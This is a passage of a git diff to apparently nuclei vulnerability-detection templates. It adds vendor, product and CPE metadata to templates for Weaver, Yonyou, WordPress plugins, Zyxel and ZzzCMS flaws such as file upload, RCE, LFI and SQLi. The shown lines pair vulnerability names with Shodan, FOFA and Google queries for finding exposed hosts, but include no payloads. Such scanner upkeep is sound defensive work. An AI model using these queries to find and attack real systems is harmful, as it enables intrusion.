-# digest: 490a004630440220790332461df03baf07989c298e9db35de0c2cb4167ab3fe056e411e36a9a0bb102207a458e4f016d324d92d1ec64d8f6cb99afd2e9cdbb5b304485c5d504bcfe1322:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220790332461df03baf07989c298e9db35de0c2cb4167ab3fe056e411e36a9a0bb102207a458e4f016d324d92d1ec64d8f6cb99afd2e9cdbb5b304485c5d504bcfe1322:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
index 04c63cc834..f69bda6c3c 100755
--- a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
@@ -13,7 +13,11 @@ info:
max-request: 2
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: weaver,ecology,fileupload,intrusive
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
variables:
num1: "{{rand_int(40000, 50000)}}"
num2: "{{rand_int(40000, 50000)}}"
diff --git a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml
index 85dad0d119..3b282147e9 100644
--- a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml
+++ b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="泛微-EOffice"
+ product: e-office
+ vendor: weaver
tags: ecology,weaver,oa,lfi
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
index ce0e89d493..10e7a1756d 100755
--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@@ -12,7 +12,11 @@ info:
verified: true
max-request: 2
fofa-query: app="泛微-EOffice"
+ product: e-office
+ vendor: weaver
tags: weaver,e-office,oa,rce,intrusive,fileupload
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
variables:
filename: "{{to_lower(rand_base(5))}}"
string: "weaver-office-server-file-upload"
@@ -52,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502203127ce2e098b2266d9481c1c61ac61144546c744a6df4106dd3ceebee2e93767022100802af24d36ee037cd653efa73e917ade93c76cc561d9572fb27f38bfffdd04b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203127ce2e098b2266d9481c1c61ac61144546c744a6df4106dd3ceebee2e93767022100802af24d36ee037cd653efa73e917ade93c76cc561d9572fb27f38bfffdd04b5:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
index 4e1aa20a48..2382dac256 100755
--- a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="泛微-EOffice"
+ product: e-office
+ vendor: weaver
tags: weaver,e-cology,oa,lfi
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml b/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml
index 5d042369f3..1c9b8ab04a 100755
--- a/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="泛微-E-Weaver"
+ product: e-cology
+ vendor: weaver
tags: ecology,weaver,oa,lfi
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml b/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml
index 36d8cc98dd..0283b08fe2 100755
--- a/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml
+++ b/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
fofa-query: app="泛微-E-Weaver"
+ product: e-cology
+ vendor: weaver
tags: weaver,e-cology,oa,lfi
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
index a16b362c11..061a4b4733 100755
--- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 3
fofa-query: app="泛微-EOffice"
+ product: e-office
+ vendor: weaver
tags: weaver,e-office,oa,intrusive,rce,fileupload
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
variables:
filename: "{{to_lower(rand_base(5))}}"
string: "weaver-uploadify-file-upload"
@@ -51,4 +55,4 @@ http:
part: body_3
words:
- '{{md5(string)}}'
-# digest: 4a0a00473045022100ea1e7695c9aaf1ada15cdf7fa48fd1c6ceeb59531a0cd0eff574e82be9e7729202207a3ba25d67b43620582053921ed636208d01159dc85788a8961b33220a8a3a07:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ea1e7695c9aaf1ada15cdf7fa48fd1c6ceeb59531a0cd0eff574e82be9e7729202207a3ba25d67b43620582053921ed636208d01159dc85788a8961b33220a8a3a07:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
index b3e4dd4341..07d85433e7 100755
--- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
@@ -12,7 +12,11 @@ info:
metadata:
max-request: 3
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: ecology,fileupload,intrusive
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
variables:
filename: "{{to_lower(rand_base(5))}}"
string: "{{randstr}}"
diff --git a/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml b/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml
index 9861f40195..0ffd2d99a6 100755
--- a/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml
+++ b/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
fofa-query: app="泛微-EOffice"
+ product: e-office
+ vendor: weaver
tags: weaver,e-office,oa,unauth
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/wechat/wechat-info-leak.yaml b/http/vulnerabilities/wechat/wechat-info-leak.yaml
index 89ecb10f3f..c610f533c0 100644
--- a/http/vulnerabilities/wechat/wechat-info-leak.yaml
+++ b/http/vulnerabilities/wechat/wechat-info-leak.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: body="wework_admin.normal_layout"
+ product: wechat
+ vendor: tencent
tags: wechat,exposure,tencent
+ classification:
+ cpe: cpe:2.3:a:tencent:wechat:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml
index 9c07ff965f..5a4ac79bdf 100644
--- a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml
+++ b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
+ cpe: cpe:2.3:a:analytify:analytify_-_google_analytics_dashboard:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
google-query: inurl:/wp-content/plugins/wp-analytify
+ product: analytify_-_google_analytics_dashboard
+ vendor: analytify
tags: wp,wordpress,analytify,wpscan,wp-plugin,xss
http:
diff --git a/http/vulnerabilities/wordpress/booked-export-csv.yaml b/http/vulnerabilities/wordpress/booked-export-csv.yaml
index 4bcd32f37c..9971d2242a 100644
--- a/http/vulnerabilities/wordpress/booked-export-csv.yaml
+++ b/http/vulnerabilities/wordpress/booked-export-csv.yaml
@@ -17,8 +17,12 @@ info:
fofa-query: "wp-content/plugins/booked/"
publicwww-query: "/wp-content/plugins/booked/"
google-query: inurl:"/wp-content/plugins/booked/"
+ product: booked
+ vendor: twinkletoessoftware
tags: wordpress,wpscan,wp-plugin,wp,booked,bypass
+ classification:
+ cpe: cpe:2.3:a:twinkletoessoftware:booked:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml
index b86c8ad0f2..0ed18d7f49 100644
--- a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml
+++ b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/photo-gallery"
+ product: photo_gallery
+ vendor: 10web
tags: wpscan,wp,wp-plugin,wordpress,xss,photo-gallery,authenticated
+ classification:
+ cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:wordpress:*:*:*
http:
- raw:
- |
@@ -45,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ed838d1eb6e31bb67b91342275beb740717183a647ca0a4de4ba234b04d4e99402201d07b07900c542788eb8c84bc3c667c8c50239ae69e7c8e8fb4b80dfe8dd0732:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ed838d1eb6e31bb67b91342275beb740717183a647ca0a4de4ba234b04d4e99402201d07b07900c542788eb8c84bc3c667c8c50239ae69e7c8e8fb4b80dfe8dd0732:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml
index d8eee65d19..6b5469fa8f 100644
--- a/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml
+++ b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml
@@ -15,8 +15,12 @@ info:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
+ product: gallery_photoblocks
+ vendor: wpchill
tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss
+ classification:
+ cpe: cpe:2.3:a:wpchill:gallery_photoblocks:*:*:*:*:wordpress:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/wordpress/shortcode-lfi.yaml b/http/vulnerabilities/wordpress/shortcode-lfi.yaml
index d3d77df2df..ec7d8c22f3 100644
--- a/http/vulnerabilities/wordpress/shortcode-lfi.yaml
+++ b/http/vulnerabilities/wordpress/shortcode-lfi.yaml
@@ -11,9 +11,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:halulu:simple-download-button-shortcode:*:*:*:*:wordpress:*:*:*
metadata:
max-request: 1
google-query: inurl:wp/wp-content/force-download.php
+ product: simple-download-button-shortcode
+ vendor: halulu
tags: lfi,shortcode,wp,packetstorm,wordpress,wp-plugin
http:
diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
index 955028d8a5..c85cd27a5a 100644
--- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
+++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
@@ -11,8 +11,12 @@ info:
metadata:
max-request: 2
fofa-query: body="oembed" && body="wp-"
+ product: wordpress
+ vendor: wordpress
tags: wordpress,ssrf,oast,oembed
+ classification:
+ cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -33,4 +37,4 @@ http:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
-# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml
index 1459b7f9ce..edfe479688 100644
--- a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml
+++ b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml
@@ -17,7 +17,11 @@ info:
max-request: 2
publicwww-query: /wp-content/plugins/gallery-plugin/
google-query: inurl:/wp-content/plugins/gallery-plugin/
+ product: gallery
+ vendor: bestwebsoft
tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive
+ classification:
+ cpe: cpe:2.3:a:bestwebsoft:gallery:*:*:*:*:wordpress:*:*:*
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml b/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
index 77a8115984..18eccfad20 100644
--- a/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
+++ b/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
@@ -8,8 +8,12 @@ info:
metadata:
max-request: 1
google-query: inurl:/wp-content/plugins/mstore-api/
+ product: mstore_api
+ vendor: inspireui
tags: wordpress,listing,wp-plugin
+ classification:
+ cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:wordpress:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml b/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml
index 812d486da6..8522a3009a 100644
--- a/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml
@@ -14,10 +14,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
+ cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/themes/realestate-7/"
+ product: real_estate_7
+ vendor: contempothemes
tags: packetstorm,wordpress,wp-theme,wp,xss,realestate
http:
diff --git a/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml
index 52d75c141e..d7f3288bc3 100644
--- a/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml
+++ b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/social-warfare/"
+ product: social_warfare
+ vendor: warfareplugins
tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
+ classification:
+ cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:wordpress:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
index 33e5cb58b6..52adab9487 100644
--- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
+++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
@@ -15,8 +15,12 @@ info:
verified: true
max-request: 2
publicwww-query: /wp-content/plugins/wp-statistics/
+ product: wp_statistics
+ vendor: veronalabs
tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp
+ classification:
+ cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:wordpress:*:*:*
flow: http(1) && http(2)
http:
@@ -43,4 +47,4 @@ http:
- 'duration>=7'
- 'status_code == 500'
condition: and
-# digest: 4b0a00483046022100abaa28e651b210b16c0910cfc40de1dc65e41bdbf4150e144034996b9e6f6d67022100c71a5be312c71de5824d7fde059005c193b18d031d8c1d42c9459cbc4f1762bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100abaa28e651b210b16c0910cfc40de1dc65e41bdbf4150e144034996b9e6f6d67022100c71a5be312c71de5824d7fde059005c193b18d031d8c1d42c9459cbc4f1762bc:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml
index a1a731a66a..5140a12ab9 100644
--- a/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml
+++ b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml
@@ -14,8 +14,12 @@ info:
max-request: 1
publicwww-query: /wp-content/plugins/superstorefinder-wp/
google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php"
+ product: super_store_finder
+ vendor: superstorefinder
tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig
+ classification:
+ cpe: cpe:2.3:a:superstorefinder:super_store_finder:*:*:*:*:wordpress:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/wordpress/wp-sym404.yaml b/http/vulnerabilities/wordpress/wp-sym404.yaml
index e2d619ba73..0d3db3de75 100644
--- a/http/vulnerabilities/wordpress/wp-sym404.yaml
+++ b/http/vulnerabilities/wordpress/wp-sym404.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
google-query: inurl:"/wp-includes/sym404/"
+ product: wp_extra
+ vendor: wpvnteam
tags: wordpress,listing,wp,exposure
+ classification:
+ cpe: cpe:2.3:a:wpvnteam:wp_extra:*:*:*:*:wordpress:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/wordpress/wp-touch-redirect.yaml b/http/vulnerabilities/wordpress/wp-touch-redirect.yaml
index 4f95c2069a..f529d79221 100644
--- a/http/vulnerabilities/wordpress/wp-touch-redirect.yaml
+++ b/http/vulnerabilities/wordpress/wp-touch-redirect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
google-query: "inurl:/wp-content/plugins/wptouch"
+ product: wptouch
+ vendor: bravenewcode
tags: wp-plugin,wp,packetstorm,wptouch,unauth,redirect,wordpress
+ classification:
+ cpe: cpe:2.3:a:bravenewcode:wptouch:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml b/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml
index 3dd45c2338..64e3ff5995 100644
--- a/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml
+++ b/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
google-query: inurl:"/author-sitemap.xml"
+ product: yoast_seo
+ vendor: yoast
tags: wp,wp-plugin,wordpress,username,disclosure
+ classification:
+ cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:wordpress:*:*:*
http:
- raw:
- |
@@ -38,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022047ff660cb9bf3356e8492c2525614a375bb960108ec4935be7d35cde6224149202203d96ace3f2c72c5618a2af1c6138367709ce3adfd90f34ab3eda2f35d82ff160:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022047ff660cb9bf3356e8492c2525614a375bb960108ec4935be7d35cde6224149202203d96ace3f2c72c5618a2af1c6138367709ce3adfd90f34ab3eda2f35d82ff160:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
index 996b6b2dca..efb620b81d 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 2
fofa-query: icon_hash="1085941792"
+ product: ufida-nc
+ vendor: yonyou
tags: yonyou,nc,intrusive,fileupload
+ classification:
+ cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
index 9c9651a8bb..0b8c7e5912 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="Yonyou-UFIDA-NC"
+ product: ufida-nc
+ vendor: yonyou
tags: yonyou,nc,fileupload,baseapp,deserialization,intrusive
+ classification:
+ cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
index 374ae31b0d..15d56ecf47 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 2
fofa-query: icon_hash="1085941792"
+ product: ufida-nc
+ vendor: yonyou
tags: yonyou,intrusive,fileupload
+ classification:
+ cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
index 06d784f482..740d839410 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
@@ -13,7 +13,11 @@ info:
verified: true
max-request: 2
fofa-query: app="用友-UFIDA-NC
+ product: ufida-nc
+ vendor: yonyou
tags: yonyou,intrusive,ufida,fileupload
+ classification:
+ cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
variables:
v1: "{{rand_int(1,100)}}"
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml
index 357b6d2081..9e983bce04 100644
--- a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
fofa-query: app="用友-UFIDA-NC
+ product: ufida-nc
+ vendor: yonyou
tags: yonyou,nc,exposure
+ classification:
+ cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
index daeecbc08e..904639a33b 100644
--- a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 2
fofa-query: app="用友-UFIDA-NC
+ product: ufida-nc
+ vendor: yonyou
tags: yonyou,rce,deserialization
+ classification:
+ cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml b/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml
index 217e6d4453..bae34577e0 100644
--- a/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="用友-移动系统管理"
+ product: ufida-nc
+ vendor: yonyou
tags: yonyou,ufida,lfi
+ classification:
+ cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +35,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c3a2a882cbb2f8cc83f6a51534bca511ca636c21a6a1b9a3c9ea856d3decadb9022100e0b7a63f900e860e664e03c6f3a43dfceaecd5ab4c7b7aeb5b920d9dc27369ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c3a2a882cbb2f8cc83f6a51534bca511ca636c21a6a1b9a3c9ea856d3decadb9022100e0b7a63f900e860e664e03c6f3a43dfceaecd5ab4c7b7aeb5b920d9dc27369ef:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/zend/zend-v1-xss.yaml b/http/vulnerabilities/zend/zend-v1-xss.yaml
index 8bc04a5820..dfaa454200 100644
--- a/http/vulnerabilities/zend/zend-v1-xss.yaml
+++ b/http/vulnerabilities/zend/zend-v1-xss.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 2
google-query: inurl:"/tests/Zend/Http/"
+ product: zend_framework
+ vendor: zend
tags: zend,zendframework,xss
+ classification:
+ cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml b/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml
index dce38605bc..d70daf904c 100644
--- a/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml
+++ b/http/vulnerabilities/zyxel/unauth-ztp-ping.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"USG FLEX"
+ product: usg1000_firmware
+ vendor: zyxel
tags: misconfig,unauth,zyxel,ztp,rce,oast
+ classification:
+ cpe: cpe:2.3:o:zyxel:usg1000_firmware:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml
index a79ec2a893..5a1a4c63b8 100644
--- a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml
+++ b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml
@@ -13,8 +13,12 @@ info:
max-request: 1
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
+ product: zzzcms
+ vendor: zzzcms
tags: zzzcms,info,disclosure
+ classification:
+ cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
index c1038807be..5a9dc06e87 100644
--- a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
+++ b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
@@ -12,7 +12,11 @@ info:
max-request: 1
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
+ product: zzzcms
+ vendor: zzzcms
tags: zzzcms,ssrf,oast
+ classification:
+ cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:*
variables:
filename: "{{to_lower(rand_text_alpha(4))}}"
@@ -42,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220339262dc59b62cb3b19303288bfc967cdda661cd394c67e7bb57ba997007cc9f022006e52d3e51f444f1c203c2d37c8ef2338c87e559a1a995e15d484b232de7935a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220339262dc59b62cb3b19303288bfc967cdda661cd394c67e7bb57ba997007cc9f022006e52d3e51f444f1c203c2d37c8ef2338c87e559a1a995e15d484b232de7935a:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml
index db98cd5423..5231cfe166 100644
--- a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml
+++ b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml
@@ -12,8 +12,12 @@ info:
max-request: 1
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
+ product: zzzcms
+ vendor: zzzcms
